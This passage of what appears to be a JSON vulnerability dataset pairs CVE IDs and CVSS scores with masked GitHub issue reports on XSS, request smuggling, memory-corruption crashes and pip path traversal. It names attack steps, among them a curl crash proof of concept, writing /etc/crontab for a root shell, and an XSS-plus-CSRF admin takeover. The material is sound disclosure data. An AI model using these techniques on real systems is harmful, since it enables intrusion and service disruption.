  42293. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/26",
  42294. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/26",
  42295. "Repo_new": "cybersecurityworks/disclosed",
  42296. "Issue_Created_At": "2020-01-20T11:30:13Z",
  42297. "description": "Stored Cross Site Scripting (XSS) in APITAG variable | WSO2 Product (WSO2 Identity Server version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Stored APITAG Cross Site Scripting (XSS) APITAG Product Name: APITAG WSO2 APITAG Server: APITAG WSO2 Identity Server APITAG Version: APITAG NUMBERTAG APITAG Homepage: FILETAG Severity: Low Status: Fixed Exploitation Requires Authentication?: APITAG yes APITAG Vulnerable URL: FILETAG Vulnerable Variable: APITAG APITAG AFFECTED PRODUCTS: FILETAG Figure NUMBERTAG Edit APITAG value in APITAG section FILETAG Figure NUMBERTAG Save APITAG with XSS payload, ERRORTAG FILETAG Figure NUMBERTAG Injected XSS payload gets stored to the application FILETAG Figure NUMBERTAG Injected XSS Payload gets stored and executed in the browser FILETAG Figure NUMBERTAG The stored XSS payload gets executed in APITAG throughout the page whenever the user loads the page APITAG Steps APITAG NUMBERTAG Login to the Application NUMBERTAG Go to APITAG URL. APITAG NUMBERTAG Click on Metadata to edit values NUMBERTAG Edit & Save APITAG value with XSS Payload, ERRORTAG NUMBERTAG Now, the injected XSS Payload gets executed whenever the user visits the page. APITAG APITAG NUMBERTAG Discovered in APITAG Version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team, APITAG for your analysis report. We will evaluate your finding and get back to you soon with our feedback NUMBERTAG Fixing in all affected versions NUMBERTAG Customer Announcement Done. Public Announcement is scheduled at the end of September NUMBERTAG Got mail saying, \"We have scheduled a public announcement for the issue by the end of this week NUMBERTAG Got mail saying, APITAG Announcement is done. Public Announcement is scheduled at end of November NUMBERTAG Got mail saying, \"We have done the public announcement for the remaining two issues. Kindly note that we have aggregated the following two issues NUMBERTAG Got mail saying, \"... 
stored XSS issues APITAG No NUMBERTAG Document No NUMBERTAG were reported in registry UI. After analyzing the impact, CVSS Score and fix for the above two issues, we decided to deliver the fix with the same advisory id and patch since the issues could be fixed in the same component. ...\" Please APITAG refer APITAG NUMBERTAG for Security Advisory APITAG APITAG Since, we have contributed on APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG APITAG WSO NUMBERTAG APITAG and APITAG WSO NUMBERTAG APITAG to WSO2 team, our name already got listed in their security acknowledgment APITAG page APITAG NUMBERTAG URLTAG NUMBERTAG URLTAG APITAG by: APITAG APITAG Sathish Kumar Balakrishnan APITAG from APITAG Cyber Security Research Lab APITAG",
  42298. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42299. "severity": "MEDIUM",
  42300. "baseScore": 4.8,
  42301. "impactScore": 2.7,
  42302. "exploitabilityScore": 1.7
  42303. },
  42304. {
  42305. "CVE_ID": "CVE-2019-20444",
  42306. "Issue_Url_old": "https://github.com/netty/netty/issues/9866",
  42307. "Issue_Url_new": "https://github.com/netty/netty/issues/9866",
  42308. "Repo_new": "netty/netty",
  42309. "Issue_Created_At": "2019-12-10T12:38:14Z",
  42310. "description": "Netty shouldn't allow the invalid fold.. Expected behavior Netty shouldn't allow the invalid fold. According to RFC NUMBERTAG FILETAG CODETAG A Sp or HTAB should follow the CRLF. But Netty allows a CRLF without a SP or HTAB. APITAG Actual behavior Netty accepts the invalid fold. This may cause http smuggling. Steps to reproduce Send a request like this: APITAG Minimal yet complete reproducer code (or URL to code) Netty version all JVM version (e.g. APITAG ) java version NUMBERTAG OS version (e.g. ERRORTAG ) Darwin APITAG APITAG NUMBERTAG Darwin Kernel Version NUMBERTAG Thu Oct NUMBERTAG PDT NUMBERTAG root:xnu APITAG NUMBERTAG",
  42311. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  42312. "severity": "CRITICAL",
  42313. "baseScore": 9.1,
  42314. "impactScore": 5.2,
  42315. "exploitabilityScore": 3.9
  42316. },
  42317. {
  42318. "CVE_ID": "CVE-2019-20445",
  42319. "Issue_Url_old": "https://github.com/netty/netty/issues/9861",
  42320. "Issue_Url_new": "https://github.com/netty/netty/issues/9861",
  42321. "Repo_new": "netty/netty",
  42322. "Issue_Created_At": "2019-12-09T18:54:41Z",
  42323. "description": "Found two security issues. Expected behavior APITAG accept one Content Length. RFC NUMBERTAG says CODETAG . APITAG accept identity and chunked Transport Encoding In this implementation, the order does not matter (it probably should). The Go implementation only uses the first value of the APITAG to be in sync with the behaviour of AWS ALB. All other valid (gzip, compress, etc.) and invalid TE will return a NUMBERTAG since we don't have readers for them I figured this was the right move, but feel free to correct me Actual behavior NUMBERTAG But netty accepts all. APITAG accept random TE. Steps to reproduce Use two CL to reproduce the first. Use a chunked TE header and a random TE header. Similar to NUMBERTAG URLTAG . It also causes http smuggling. Or see the other issue benoitc/gunicorn NUMBERTAG URLTAG and the PR benoitc/gunicorn NUMBERTAG URLTAG Minimal yet complete reproducer code (or URL to code) Netty version all JVM version (e.g. APITAG ) OS version (e.g. ERRORTAG )",
  42324. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  42325. "severity": "CRITICAL",
  42326. "baseScore": 9.1,
  42327. "impactScore": 5.2,
  42328. "exploitabilityScore": 3.9
  42329. },
  42330. {
  42331. "CVE_ID": "CVE-2019-20628",
  42332. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1269",
  42333. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1269",
  42334. "Repo_new": "gpac/gpac",
  42335. "Issue_Created_At": "2019-07-06T00:10:37Z",
  42336. "description": "Use After Free APITAG Hi, Our fuzzer found an UAF on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG efb0 at pc NUMBERTAG d bp NUMBERTAG ffd5d0bb3c0 sp NUMBERTAG ffd5d0bb3b0 WRITE of size NUMBERTAG at NUMBERTAG efb0 thread T NUMBERTAG c in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f NUMBERTAG ce NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG NUMBERTAG efb0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG in gf_m2ts_gather_section PATHTAG previously allocated by thread T0 here NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG in gf_m2ts_gather_section PATHTAG ~~~ Thanks, Manh Dung",
  42337. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42338. "severity": "MEDIUM",
  42339. "baseScore": 5.5,
  42340. "impactScore": 3.6,
  42341. "exploitabilityScore": 1.8
  42342. },
  42343. {
  42344. "CVE_ID": "CVE-2019-20629",
  42345. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1264",
  42346. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1264",
  42347. "Repo_new": "gpac/gpac",
  42348. "Issue_Created_At": "2019-07-05T22:57:04Z",
  42349. "description": "SEGV (heap buffer overflow) on gf_m2ts_process_pmt. Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master) due to a heap buffer overflow on function gf_m2ts_process_pmt. APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG add at pc NUMBERTAG a6 bp NUMBERTAG ffd NUMBERTAG f NUMBERTAG c0 sp NUMBERTAG ffd NUMBERTAG f NUMBERTAG b0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG add thread T NUMBERTAG a5 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f2f NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42350. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42351. "severity": "MEDIUM",
  42352. "baseScore": 5.5,
  42353. "impactScore": 3.6,
  42354. "exploitabilityScore": 1.8
  42355. },
  42356. {
  42357. "CVE_ID": "CVE-2019-20630",
  42358. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1268",
  42359. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1268",
  42360. "Repo_new": "gpac/gpac",
  42361. "Issue_Created_At": "2019-07-06T00:10:13Z",
  42362. "description": "heap buffer overflow on APITAG Hi, Our fuzzer found a buffer overflow on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG a NUMBERTAG at pc NUMBERTAG c2aa bp NUMBERTAG ffded NUMBERTAG d0 sp NUMBERTAG ffded NUMBERTAG c0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG a NUMBERTAG thread T NUMBERTAG c2a9 in APITAG PATHTAG NUMBERTAG c2a9 in gf_bs_read_bit PATHTAG NUMBERTAG ecc7 in gf_bs_read_double PATHTAG NUMBERTAG d in gf_odf_read_mediatime PATHTAG NUMBERTAG bb in gf_odf_parse_descriptor PATHTAG NUMBERTAG b NUMBERTAG in gf_odf_read_iod PATHTAG NUMBERTAG bb in gf_odf_parse_descriptor PATHTAG NUMBERTAG b0 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG fe2e NUMBERTAG fa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42363. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42364. "severity": "MEDIUM",
  42365. "baseScore": 5.5,
  42366. "impactScore": 3.6,
  42367. "exploitabilityScore": 1.8
  42368. },
  42369. {
  42370. "CVE_ID": "CVE-2019-20631",
  42371. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1270",
  42372. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1270",
  42373. "Repo_new": "gpac/gpac",
  42374. "Issue_Created_At": "2019-07-06T00:11:01Z",
  42375. "description": "SEGV on unknown address on gf_list_count. Hi, Our fuzzer found an UAF on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG fff NUMBERTAG pc NUMBERTAG a NUMBERTAG d bp NUMBERTAG bfa0 sp NUMBERTAG ffe5b NUMBERTAG b0 T NUMBERTAG a NUMBERTAG c in gf_list_count PATHTAG NUMBERTAG d4 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG ff NUMBERTAG fe NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42376. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42377. "severity": "MEDIUM",
  42378. "baseScore": 5.5,
  42379. "impactScore": 3.6,
  42380. "exploitabilityScore": 1.8
  42381. },
  42382. {
  42383. "CVE_ID": "CVE-2019-20632",
  42384. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1271",
  42385. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1271",
  42386. "Repo_new": "gpac/gpac",
  42387. "Issue_Created_At": "2019-07-06T00:25:31Z",
  42388. "description": "SEGV on unknown address on gf_odf_delete_descriptor. Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG diso APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG ff NUMBERTAG pc NUMBERTAG c3ef6d bp NUMBERTAG bfa0 sp NUMBERTAG fffe NUMBERTAG bf NUMBERTAG T NUMBERTAG c3ef6c in gf_odf_delete_descriptor PATHTAG NUMBERTAG f NUMBERTAG in gf_odf_del_esd PATHTAG NUMBERTAG a2e in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f NUMBERTAG de NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42389. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42390. "severity": "MEDIUM",
  42391. "baseScore": 5.5,
  42392. "impactScore": 3.6,
  42393. "exploitabilityScore": 1.8
  42394. },
  42395. {
  42396. "CVE_ID": "CVE-2019-20789",
  42397. "Issue_Url_old": "https://github.com/croogo/croogo/issues/940",
  42398. "Issue_Url_new": "https://github.com/croogo/croogo/issues/940",
  42399. "Repo_new": "croogo/croogo",
  42400. "Issue_Created_At": "2019-11-27T14:35:29Z",
  42401. "description": "Croogo NUMBERTAG Cms Has Multiple Stored XSS Vulnerabilities. URL\uff1a URLTAG Payload: APITAG parameter\uff1atitle FILETAG FILETAG URL: URLTAG Payload: APITAG parameter:title FILETAG FILETAG",
  42402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42403. "severity": "MEDIUM",
  42404. "baseScore": 4.8,
  42405. "impactScore": 2.7,
  42406. "exploitabilityScore": 1.7
  42407. },
  42408. {
  42409. "CVE_ID": "CVE-2019-20798",
  42410. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1227",
  42411. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1227",
  42412. "Repo_new": "cherokee/webserver",
  42413. "Issue_Created_At": "2019-07-25T14:44:52Z",
  42414. "description": "Reflected XSS in About page. The requested URL is improperly displayed on the About page. The problem occurs in the default configuration in Cherokee and the Cherokee administrator panel. XSS in the administrator panel can be used to reconfigure the server and execute arbitrary commands. APITAG APITAG",
  42415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H",
  42416. "severity": "HIGH",
  42417. "baseScore": 8.4,
  42418. "impactScore": 6.0,
  42419. "exploitabilityScore": 1.7
  42420. },
  42421. {
  42422. "CVE_ID": "CVE-2019-20799",
  42423. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1221",
  42424. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1221",
  42425. "Repo_new": "cherokee/webserver",
  42426. "Issue_Created_At": "2019-07-25T14:31:07Z",
  42427. "description": "remote null pointer dereference trigger in admin handler. It's possible to trigger NULL pointer dereference in case if request uses POST method with empty body. cherokee/handler_admin.c ERRORTAG If post body is empty then post.buf is NULL and strchr on tmp results in NULL pointer dereference. Proof of concept: curl d \"\" URLTAG test NUMBERTAG is the admin handler. ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file ERRORTAG",
  42428. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42429. "severity": "HIGH",
  42430. "baseScore": 7.5,
  42431. "impactScore": 3.6,
  42432. "exploitabilityScore": 3.9
  42433. },
  42434. {
  42435. "CVE_ID": "CVE-2019-20799",
  42436. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1222",
  42437. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1222",
  42438. "Repo_new": "cherokee/webserver",
  42439. "Issue_Created_At": "2019-07-25T14:34:23Z",
  42440. "description": "escape_with_table invalid access. cherokee/buffer.c: CODETAG in the line NUMBERTAG s is used to index is_char_escaped table. Because s is signed then we can get (negative value NUMBERTAG which results in negative value, so we access memory _before_ is_char_escaped. Simple APITAG to reproduce APITAG test8 is a handler for proxy module Patch for this issue: diff git PATHTAG PATHTAG index APITAG NUMBERTAG PATHTAG +++ PATHTAG APITAG NUMBERTAG APITAG escape_with_table (cherokee_buffer_t buffer, uint NUMBERTAG t is_char_escaped) { char t; const char s, s_next; char end; + const unsigned char s, s_next; + unsigned char end; cuint_t n_escape NUMBERTAG static char APITAG NUMBERTAG abcdef\";",
  42441. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42442. "severity": "HIGH",
  42443. "baseScore": 7.5,
  42444. "impactScore": 3.6,
  42445. "exploitabilityScore": 3.9
  42446. },
  42447. {
  42448. "CVE_ID": "CVE-2019-20799",
  42449. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1225",
  42450. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1225",
  42451. "Repo_new": "cherokee/webserver",
  42452. "Issue_Created_At": "2019-07-25T14:41:51Z",
  42453. "description": "heap buffer overflow in handler cgi. APITAG ERRORTAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file FILETAG",
  42454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42455. "severity": "HIGH",
  42456. "baseScore": 7.5,
  42457. "impactScore": 3.6,
  42458. "exploitabilityScore": 3.9
  42459. },
  42460. {
  42461. "CVE_ID": "CVE-2019-20799",
  42462. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1226",
  42463. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1226",
  42464. "Repo_new": "cherokee/webserver",
  42465. "Issue_Created_At": "2019-07-25T14:44:01Z",
  42466. "description": "incorrectly used ip NUMBERTAG in proxy connection. A socket structure is incorrectly used as ip NUMBERTAG while connecting to a proxy server. APITAG APITAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file FILETAG",
  42467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42468. "severity": "HIGH",
  42469. "baseScore": 7.5,
  42470. "impactScore": 3.6,
  42471. "exploitabilityScore": 3.9
  42472. },
  42473. {
  42474. "CVE_ID": "CVE-2019-20800",
  42475. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1224",
  42476. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1224",
  42477. "Repo_new": "cherokee/webserver",
  42478. "Issue_Created_At": "2019-07-25T14:37:07Z",
  42479. "description": "CGI Handler too many headers. struct cherokee_handler_cgi_t (handler_cgi.h) consist of a fixed sized array (char envp[ENV_VAR_NUM]) for environ variables. Sending a request with a lot of headers, causes to increment int envp_last to a value greater than ENV_VAR_NUM resulting in reading outside the array. handler_cgi.c: APITAG APITAG CODETAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file ERRORTAG",
  42480. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42481. "severity": "CRITICAL",
  42482. "baseScore": 9.8,
  42483. "impactScore": 5.9,
  42484. "exploitabilityScore": 3.9
  42485. },
  42486. {
  42487. "CVE_ID": "CVE-2019-20804",
  42488. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/57",
  42489. "Issue_Url_new": "https://github.com/gilacms/gila/issues/57",
  42490. "Repo_new": "gilacms/gila",
  42491. "Issue_Created_At": "2019-10-29T16:48:33Z",
  42492. "description": "XSS + CSRF Admin account takeover. Title Persistence XSS at \" URLTAG \" Description A number of factors lead to an attack that could compromise an admin user account. The following steps describe how to achieve it. First, the functionality in question is vulnerable to XSS attacks in the field responsible for changing the page header. Due to the fact that this feature does not have any anti CSRF token ( URLTAG an attack using an auto submit form containing XSS is feasible. thema in question .. as aggravating none of the admin user session tokens, they are protected with the HTTP only flag, ie they can be caught via scripting languages. POC The following two demos illustrate respectively, direct insertion via functionality, and shortly after a proof of concept using an attacker's domain site and the victim (in this case the admin) by clicking on the form containing the same request to fire and persist a XSS on your blog homepage FILETAG Attack POC FILETAG",
  42493. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42494. "severity": "HIGH",
  42495. "baseScore": 8.8,
  42496. "impactScore": 5.9,
  42497. "exploitabilityScore": 2.8
  42498. },
  42499. {
  42500. "CVE_ID": "CVE-2019-20805",
  42501. "Issue_Url_old": "https://github.com/upx/upx/issues/317",
  42502. "Issue_Url_new": "https://github.com/upx/upx/issues/317",
  42503. "Repo_new": "upx/upx",
  42504. "Issue_Created_At": "2019-11-21T09:32:01Z",
  42505. "description": "upx devel ddos Vulnerability. ubuntu NUMBERTAG PATHTAG ddos NUMBERTAG attachment APITAG APITAG unsigned const nbucket = get_te NUMBERTAG hashtab FILETAG",
  42506. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42507. "severity": "MEDIUM",
  42508. "baseScore": 5.5,
  42509. "impactScore": 3.6,
  42510. "exploitabilityScore": 1.8
  42511. },
  42512. {
  42513. "CVE_ID": "CVE-2019-20894",
  42514. "Issue_Url_old": "https://github.com/containous/traefik/issues/5312",
  42515. "Issue_Url_new": "https://github.com/traefik/traefik/issues/5312",
  42516. "Repo_new": "traefik/traefik",
  42517. "Issue_Created_At": "2019-09-06T13:32:38Z",
  42518. "description": "Mutual TLS verification skipped for established connection. Do you want to request a feature or report a bug ? Bug Did you try using a NUMBERTAG configuration for the version NUMBERTAG Yes [x] No What did you do? APITAG good illustration URLTAG of very related problem. I have NUMBERTAG ingress routes with APITAG provider. First service expected to have ordinary LE and https. Second service expected to be served only with mutual TLS (mtls) My k8s definitions: yaml APITAG extensions NUMBERTAG kind: Deployment metadata: name: meow spec: replicas NUMBERTAG selector: APITAG app: meow template: metadata: labels: app: meow spec: containers: name: meow image: PATHTAG ports: APITAG NUMBERTAG APITAG NUMBERTAG kind: Service metadata: name: meow svc spec: ports: port NUMBERTAG APITAG NUMBERTAG protocol: TCP name: http selector: app: meow APITAG APITAG kind: APITAG metadata: name: meow svc https spec: APITAG https routes: match: Host( APITAG ) kind: Rule services: name: meow svc port NUMBERTAG middlewares: name: test header name: passtlsclientcert tls: options: name: tls with client verification APITAG APITAG kind: APITAG metadata: name: meow svc https spec: APITAG https routes: match: Host( APITAG ) kind: Rule services: name: meow svc port NUMBERTAG middlewares: name: test header name: passtlsclientcert doesn't require TLS tls: {} APITAG APITAG kind: APITAG metadata: name: tls with client verification labels: app: traefik chart: traefik NUMBERTAG release: \"traefik\" heritage: APITAG spec: APITAG APITAG APITAG [ APITAG APITAG APITAG APITAG APITAG APITAG APITAG ] APITAG true APITAG APITAG my tls secret APITAG APITAG APITAG APITAG kind: Middleware metadata: name: passtlsclientcert spec: APITAG pem: true APITAG APITAG kind: Middleware metadata: name: test header spec: headers: APITAG X Script Name: \"added by APITAG APITAG X Custom Response Header: \"added by APITAG Testing NUMBERTAG ERRORTAG Testing NUMBERTAG I open my first service APITAG (that does not 
require certs) in my chrome browser and after that, I open second APITAG (that requires certs). Same behaviour with APITAG What did you expect to see? Test case NUMBERTAG ERRORTAG is Ok. Test case NUMBERTAG browser should show me ERR_BAD_SSL_CLIENT_AUTH_CERT error. Like it does in incognito for the same web page. What did you see instead? Test case NUMBERTAG ERRORTAG is Ok. Test case NUMBERTAG browser shows me page without ERR_BAD_SSL_CLIENT_AUTH_CERT error. With headers. There is not header APITAG with client certificate. Output of traefik version : APITAG version of Traefik are you using?_) CODETAG What is your environment & configuration (arguments, toml, provider, platform, ...)? CODETAG If applicable, please paste the log output in DEBUG level ( APITAG switch) ERRORTAG",
  42519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  42520. "severity": "HIGH",
  42521. "baseScore": 7.5,
  42522. "impactScore": 3.6,
  42523. "exploitabilityScore": 3.9
  42524. },
  42525. {
  42526. "CVE_ID": "CVE-2019-20909",
  42527. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/178",
  42528. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/178",
  42529. "Repo_new": "libredwg/libredwg",
  42530. "Issue_Created_At": "2019-12-31T06:04:23Z",
  42531. "description": "Several bugs need to be fixed.. Hi, I got some bugs, and I tested on the master branch and version NUMBERTAG There are NUMBERTAG heap overflow NUMBERTAG NULL pointer dereference NUMBERTAG denial of service NUMBERTAG stack overflow (this bug causes a memory leak in the master branch) in that. Compile with ASAN and use dwgrewrite to repro that. Here are some details:",
  42532. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42533. "severity": "HIGH",
  42534. "baseScore": 7.5,
  42535. "impactScore": 3.6,
  42536. "exploitabilityScore": 3.9
  42537. },
  42538. {
  42539. "CVE_ID": "CVE-2019-20916",
  42540. "Issue_Url_old": "https://github.com/pypa/pip/issues/6413",
  42541. "Issue_Url_new": "https://github.com/pypa/pip/issues/6413",
  42542. "Repo_new": "pypa/pip",
  42543. "Issue_Created_At": "2019-04-16T17:23:55Z",
  42544. "description": "pip install APITAG allow directory traversal, leading to arbitrary file write. Environment pip version: pip NUMBERTAG Python version: Python NUMBERTAG Python NUMBERTAG OS: Ubuntu NUMBERTAG Windows NUMBERTAG Description This is a security vulnerability. when installing a remote package via a specified URL \"pip install \\ APITAG \", A malicious server (or a network APITAG if downloading over HTTP) can send a Content Disposition header with filename which contains \"../\", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution. issue occurs in _download_http_url in PATHTAG poc: for linux, pip usually requires root privileges, we can write following files to get root shell: PATHTAG /etc/crontab for windows, we can write a batch file to the user startup dir, lead to command execution on next boot: PATHTAG PATHTAG for malicious header: CODETAG pip install malicious url result: ERRORTAG similar issue: CVETAG",
  42545. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42546. "severity": "HIGH",
  42547. "baseScore": 7.5,
  42548. "impactScore": 3.6,
  42549. "exploitabilityScore": 3.9
  42550. },
  42551. {
  42552. "CVE_ID": "CVE-2019-20921",
  42553. "Issue_Url_old": "https://github.com/snapappointments/bootstrap-select/issues/2199",
  42554. "Issue_Url_new": "https://github.com/snapappointments/bootstrap-select/issues/2199",
  42555. "Repo_new": "snapappointments/bootstrap-select",
  42556. "Issue_Created_At": "2019-02-14T11:10:30Z",
  42557. "description": "Escaped tags parsed as non escaped in title and data content. The bootstrap select does not respect escaped content correctly. Instead the escaped content is rendered as it would not be escaped. Sample can be seen here: URLTAG",
  42558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42559. "severity": "MEDIUM",
  42560. "baseScore": 6.1,
  42561. "impactScore": 2.7,
  42562. "exploitabilityScore": 2.8
  42563. },
  42564. {
  42565. "CVE_ID": "CVE-2019-20933",
  42566. "Issue_Url_old": "https://github.com/influxdata/influxdb/issues/12927",
  42567. "Issue_Url_new": "https://github.com/influxdata/influxdb/issues/12927",
  42568. "Repo_new": "influxdata/influxdb",
